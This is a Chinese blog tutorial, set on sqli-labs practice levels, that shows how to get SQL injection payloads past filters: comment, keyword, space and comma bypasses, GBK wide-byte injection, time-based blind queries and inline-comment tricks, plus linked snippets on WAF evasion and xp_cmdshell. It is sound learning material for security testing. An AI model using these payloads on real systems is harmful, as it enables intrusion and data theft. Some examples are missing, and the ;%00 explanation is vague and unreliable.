sql注入-绕过

最新推荐文章于 2024-05-31 14:43:45 发布
最新推荐文章于 2024-05-31 14:43:45 发布
阅读量47 收藏
点赞数
文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/134230918
版权

什么是绕过

个人理解是系统或者安全软件为了避免攻击者篡改一些参数来获取数据,就会自动过滤一些篡改信息的关键词。但系统和软件终究是人编写出来的,攻击者们还是有各种各样的方法绕过安全点的检测来达到自己的目的。

注释符号绕过

MySQL中常见的注释符有这么几个:

#注释内容
--注释内容
/* 注释内容 */

其中 - - 要注意跟后面的注释内容有一个空格

eg:less-23

在?id=1后面加一个‘判断出闭合方式为’

用之前的方法 发现闭合成功了但是不能注释掉后面的那个‘’‘

判断可能是注释符号绕过

看一下源代码

这个意思就是输入# 或者 -- 就把它替换成空白

也就是把注释符号替换掉

我们可以通过以下三种方法绕过

f1

例如

这种方法简单 但是很多时候用不了

f2

用and 和 or的方法

eg:

f3 特殊的闭合符号  ;%00

在SQL注入中,;%00可以用来注释掉SQL语句中的后续内容,从而达到绕过后续的SQL语句的效果。在引用中的例子中,;%00被用来注释掉了SQL语句中的后续内容,使得攻击者可以成功地进行SQL注入攻击。在引用中的例子中,;%00同样被用来注释掉了SQL语句中的后续内容,但是由于SQL语句本身的问题,攻击者可以通过这个SQL注入漏洞获取到回显信息。

and和or的过滤

eg:less-25

在判断数字型还是字符型的时候发现and被过滤了

尝试用一些绕过方法

1.使用大小写绕过例如
?id=1' anD 1=1 --+
2.复写过滤字符
?id=1' anandd 1=1 --+
3.用&&取代and,用|取代or
?id=1' && 1=1 --+

用大小写发现没用

利用复写绕过发现可以

用&&代替发现无法识别

用%26%26替代发现可以识别

这样就成功绕过

空格过滤绕过方式

如果空格被过滤,括号没有被过滤,可以用括号绕过。

  在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。

例如:

select(user())from dual where(1=1)and(2=2)
这种过滤方法常常用于time based盲注,例如:

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

(from for属于逗号绕过下面会有)

  上面的方法既没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时。

也可以用报错注入例如 less-26

宽字节注入

对抗的函数

1.函数addslashes()
addslashes() 函数在指定的预定义字符前添加反斜杠。这些字符是单引号(') 、双引号 (")
反斜线 (\) 与NUL (NULL字符)。

 2.replace():过滤 ' \ ,将 ' 转化为 \' ,将 \  转为 \\,将 " 转为 \" 。

转义,例如在单引号'前加反斜线“\”,则会转义没有功能性的字符“”

当写入或查询用户名“1'”时,数据库会识别单引号'为闭合符号,要求再输入一个单引号将其闭合,只查询“1”而没办法查询"1'"
如果输入“1\”,\使'失去闭合符的功能,则数据库会识别为“1"”

在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:

(1)%df 吃掉 \ 具体的方法是 urlencode('\) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(')符号在外面:

id=-1%df%27union select 1,user(),3--+

(2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。

逗号绕过

在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

使用join

union select 1,2     #等价于
union select * from (select 1)a join (select 2)b

使用like

select ascii(mid(user(),1,1))=80   #等价于
select user() like 'r%'

对于limit可以使用offset来绕过:

select * from news limit 0,1
# 等价于下面这条SQL语句
select * from news limit 1 offset 0

绕过union,select,where等
(1)使用注释符绕过:

常用注释符:

    //,-- , /**/, #, --+, -- -, ;,%00,--a

用法:

    U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

(2)使用大小写绕过:

    id=-1'UnIoN/**/SeLeCT

(3)内联注释绕过:

    id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

(4) 双关键字绕过(若删除掉第一个匹配的union就能绕过):

    id=-1'UNIunionONSeLselectECT1,2,3–-
 

阿呆不呆@qq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2021-09-01 网安实验-SQL注入-绕过函数过滤
时光隧道
09-01 4万+
一:绕过给危险字符加反斜杠的过滤 解析:本代码有三个过滤,第一个是过滤将反斜线替换为双反斜线。第二个和第三个分别是将单引号和双引号转义,即在引号前面添加反斜线。有没有注意本数据库是gbk的,那我们就可以进行『宽字节』注入了。 首先直接注入测试 发现单引号被转义了。我们在URL中插入的单引号之前插入%bf,单引号是%27。反斜线是%5c。『% bf \’』就变成了『 %bf%5c%27 』,相当于再显示就变成了『縗’』,单引号出来了。则最后的SQL语句就变成了『SELECT * FROM users W
2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
热门推荐
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
sql注入-绕过过滤空格
MichealCurry1的博客
10-09 2652
空格可以用/**/,%20替换
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 4963
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8180
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
2021-09-01 网安实验-SQL注入-绕过is_numeric过滤
时光隧道
09-01 4万+
1.在收集信息的过程中发现备份文件.index.php.swp泄漏,我们拿到了源码。 记事本打开可以看到代码内容 经过分析得到以下信息: 注入点id是被is_numeric过滤后,插入到vote表里的。把注入查询语句插入到vote表里,然后又从vote表里取出,形成二次注入。可以考虑用十六进制或者二进制绕过is_numeric,形成SQL注入。 这里我们使用火狐的插件hackbar就可以了(在浏览器工具栏的【工具】中),随便选择一部电影并提交 : 按照图中的顺序将payload进行十六进制处理(前面记
Sql注入--Waf绕过姿势
一期一会的博客
12-31 702
前言 waf(Web Application Firewall)全称为“Web应用防护系统”,通俗的讲,waf的目的是过滤请求包,正常来讲访问一个网站不会拦截你的请求包,如果你的请求包内带有一些参数会危害到网站,waf此时就起到了作用。waf算作代理防火墙中的一种。 0x00 环境准备 在这里利用phpstudy搭建一个sqli-labs环境,下载的sqli-labs安装包放至D:\phpstudy\PHPTutorial\WWW目录 开启phpstudy,访问成功 接下来在主机下载一个网站安全狗a
SQL注入漏洞-绕过
HacHunter的博客
03-08 6681
绕过条件过滤 掌握了基本的注入手段。但是随着网站开发人员的安全意识的提高,纷纷使用了各种防注入的手段。最简单的就是条件过滤了。条件过滤,顾名思义就是黑名单机制,过滤掉符合条件的语句。因此我们要想办法绕过过滤,用其他方式来实现注入绕过伪静态 伪静态:伪静态通俗点说就是假的静态页面,也就是通过各种技术手段,让动态页面的URL看上去和静态页面的一样。 .htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。 我们这里利用.htaccess文件,配置重写引擎,来实现伪静
sql注入--绕过WAF
qq_51003021的博客
08-12 2013
针对WAF的绕过
SQL注入-绕过SQL通用防注入系统
Jiajiajiang_的博客
11-08 2791
当我们输入特殊字符,类似于单引号,and,or等时,经常会被注入系统拦截,并且这种是没有记录日志的。 现在我们尝试绕过,get型的请求会被拦截,那post呢。 emmm....也被拦了 这个站点是asp的,那我们尝试用cookie传参, 我们发现没有被防注入系统拦截。 因此构造sqlmap语句 sqlmap.py -u "http://www.xxxxx.com/...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入绕过实战案例
08-31
SQL sqli-labs-master 靶场搭建
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ...
SQL注入-9种绕过Web应用程序防火墙的方式.rar
09-25
SQL注入-9种绕过web应用程序防火墙的方式,属于比较基础的,可以学习参考
第十七节 绕过剔除空格的SQL注入-01
09-15
第十七节 绕过剔除空格的SQL注入-01
mysql大表的深度分页慢sql案例(跳页分页)-2
最新发布
s2008100262
05-31 192
深度分页往往会带来全表扫描查询慢的问题,我们一定要分析执行计划,要么利用连续分页特性解决问题、要么利用索引扫描来解决问题。
【MySQL】索引
cefler的博客
05-31 541
【MySQL】索引
【Java面试】四、MySQL篇(上)
llg___的博客
05-27 944
如果去维护一个类似二叉树的结构,再查age=45的数据,则直接从根节点开始⇒ 45 > 36,去右侧 ⇒ 45 < 48 ⇒去左侧 ⇒ 查找完毕,如此,查找效率提升,这即索引的思想。是覆盖索引,虽然select * ,但其where是根据id过滤的,即用的是主键索引、聚簇索引,索引的叶子节点存了整行数据,需要返回的字段,在索引中能够全部找到。给name字段加了非聚簇索引,因此,执行如上SQL,先根据name的非聚簇索引的B+树 ⇒ A小于L,走左边,到G和J,再走左边,找到Arm ⇒ 因为是。
mysql存储地理信息的方法
m0_72958694的博客
05-27 470
mysql存储地理信息的方法详细教程。
sql注入绕过防火墙
12-01
为了绕过防火墙的SQL注入,可以使用一些技巧和方法,例如: 1. 双写绕过:在SQL注入语句中,将关键字双写,例如将SELECT写成SSELECT,将UNION写成UUNION,这样可以绕过一些简单的防火墙。 2. 使用特殊字符:在SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值